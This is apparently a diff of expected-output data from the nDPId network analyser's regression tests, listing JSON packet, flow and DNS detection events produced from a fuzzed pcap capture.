00633{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":199,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":243,"pkt_type":2115,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":243,"pkt_l4_len":0,"thread_ts_msec":1120469994988,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCENFAADlXL4AAIARWNHAqAEpwKgB\/wCKAIoA0SAWEQKRS8CoASkAigC7AAAgRU1FQkVDREJEQkRCQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0EAIEbuRVBGQ0VMRUhGQ0VQRkZGQUNBQyVzAENBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAOgDAAAAAAAAAAAhAFYAAwABAAAAAgAyAFxNQUlxU0xPVFxCUk9XU0UAAQCA\/AoATEFCMTExAAAAAA+y781oIgUBAxAAAA8BVaoA"} 00619{"packet_event_id":1,"packet_event_name":"packet","packet_id":199,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":243,"pkt_type":2115,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":243,"pkt_l4_len":0,"thread_ts_msec":1120469994988,"pkt":"\/\/\/\/\/\/\/\/AGCXD+5yCENFAADlXL4AAIARWNHAqAEpwKgB\/wCKAIoA0SAWEQKRS8CoASkAigC7AAAgRU1FQkVDREJEQkRCQ0FDQUNBQ0FDQUNBQ0FDQUNBQ0EAIEbuRVBGQ0VMRUhGQ0VQRkZGQUNBQyVzAENBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAOgDAAAAAAAAAAAhAFYAAwABAAAAAgAyAFxNQUlxU0xPVFxCUk9XU0UAAQCA\/AoATEFCMTExAAAAAA+y781oIgUBAxAAAA8BVaoA"}
00212{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":199,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2115,"global_ts_msec":1120470000407} 00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":199,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2115,"global_ts_msec":1120470000407}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470002989,"flow_last_seen":1120470002989,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470002989,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2743,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470002989,"flow_last_seen":1120470002989,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470002989,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2743,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1120470002989,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470002989,"pkt":"ADBUADRWAODtAW69CABFAABEalgAAIARTP3AqAECwKgBAQq3ADUAMKhFfMIAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1120470002989,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470002989,"pkt":"ADBUADRWAODtAW69CABFAABEalgAAIARTP3AqAECwKgBAQq3ADUAMKhFfMIAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="}
00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470002989,"flow_last_seen":1120470002989,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470002989,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2743,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470002989,"flow_last_seen":1120470002989,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470002989,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2743,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -400,8 +400,8 @@
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066201,"flow_last_seen":1120470066201,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470066201,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066201,"flow_last_seen":1120470066201,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470066201,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1120470066201,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470066201,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1Cq0AR+y1GsiAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1120470066201,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470066201,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1Cq0AR+y1GsiAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":237,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066201,"flow_last_seen":1120470066201,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470066201,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":237,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066201,"flow_last_seen":1120470066201,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470066201,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
00362{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":238,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":47,"pkt_type":10240,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":47,"pkt_l4_len":0,"thread_ts_msec":1120470066201,"pkt":"ADBUADRWAODtAW69KABFAAAhankAAIARGJPAqAEC1PIhIxPEE8QADcBLICAgICA="} 00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":238,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":47,"pkt_type":10240,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":47,"pkt_l4_len":0,"thread_ts_msec":1120470066201,"pkt":"ADBUADRWAODtAW69KABFAAAhankAAIARGJPAqAEC1PIhIxPEE8QADcBLICAgICA="}
00213{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":238,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":10240,"global_ts_msec":1120470066203} 00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":238,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":10240,"global_ts_msec":1120470066203}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":239,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066293,"flow_last_seen":1120470066293,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470066293,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2750,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":239,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066293,"flow_last_seen":1120470066293,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470066293,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2750,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1120470066293,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470066293,"pkt":"ADBUADRWAODtAW69CABFAABIanoAAIARTNfAqAECwKgBAQq+ADUANBAIP8gBAAABAAAAAAAABF9zaXAEX3VkcAR2b2lwB2JydWp1bGEDbmV0AAAhAAE="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1120470066293,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470066293,"pkt":"ADBUADRWAODtAW69CABFAABIanoAAIARTNfAqAECwKgBAQq+ADUANBAIP8gBAAABAAAAAAAABF9zaXAEX3VkcAR2b2lwB2JydWp1bGEDbmV0AAAhAAE="}
00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":239,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066293,"flow_last_seen":1120470066293,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470066293,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2750,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.voip.brujula.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":239,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470066293,"flow_last_seen":1120470066293,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470066293,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2750,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.voip.brujula.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -448,8 +448,8 @@
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":265,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469922894,"flow_last_seen":1120469922894,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470102883,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2684,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":265,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469922894,"flow_last_seen":1120469922894,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470102883,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2684,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":265,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469924897,"flow_last_seen":1120469924897,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470102883,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.17","src_port":2736,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":265,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469924897,"flow_last_seen":1120469924897,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470102883,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.17","src_port":2736,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00593{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":265,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469921898,"flow_last_seen":1120469930905,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470102883,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2736,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00593{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":265,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469921898,"flow_last_seen":1120469930905,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470102883,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2736,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00414{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":267,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470110894,"pkt":"ADBUAKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":267,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470110894,"pkt":"ADBUAKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00213{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":267,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120470112342} 00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":267,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120470112342}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":269,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470113337,"flow_last_seen":1120470113337,"flow_idle_time":180000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1120470113337,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2754,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":269,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470113337,"flow_last_seen":1120470113337,"flow_idle_time":180000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1120470113337,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2754,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1120470113337,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":17,"thread_ts_msec":1120470113337,"pkt":"ADBUADRWAODtA269CABFAAAlcwAAAIARTLzAqAECwKgBAQrCADUAPKwzfc8BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1120470113337,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":17,"thread_ts_msec":1120470113337,"pkt":"ADBUADRWAODtA269CABFAAAlcwAAAIARTLzAqAECwKgBAQrCADUAPKwzfc8BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":272,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470114910,"flow_last_seen":1120470114910,"flow_idle_time":600000,"flow_min_l4_payload_len":383,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":383,"midstream":0,"thread_ts_msec":1120470114910,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","l4_proto":118,"flow_datalink":1,"flow_max_packets":3} 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":272,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470114910,"flow_last_seen":1120470114910,"flow_idle_time":600000,"flow_min_l4_payload_len":383,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":383,"midstream":0,"thread_ts_msec":1120470114910,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","l4_proto":118,"flow_datalink":1,"flow_max_packets":3}
@@ -517,19 +517,19 @@
00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":299,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470187656,"flow_last_seen":1120470187656,"flow_idle_time":600000,"flow_min_l4_payload_len":71,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":71,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1120470187656,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","l4_proto":37,"flow_datalink":1,"flow_max_packets":3} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":299,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470187656,"flow_last_seen":1120470187656,"flow_idle_time":600000,"flow_min_l4_payload_len":71,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":71,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1120470187656,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","l4_proto":37,"flow_datalink":1,"flow_max_packets":3}
00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1120470187656,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470187656,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEAlcwDAqAEBwKgBAgA1CscAR96AKPOAAAABAAEAAAAAATFCMAEwAzEyNwdpbq1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1120470187656,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470187656,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEAlcwDAqAEBwKgBAgA1CscAR96AKPOAAAABAAEAAAAAATFCMAEwAzEyNwdpbq1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":303,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470002989,"flow_last_seen":1120470002991,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470187658,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2743,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 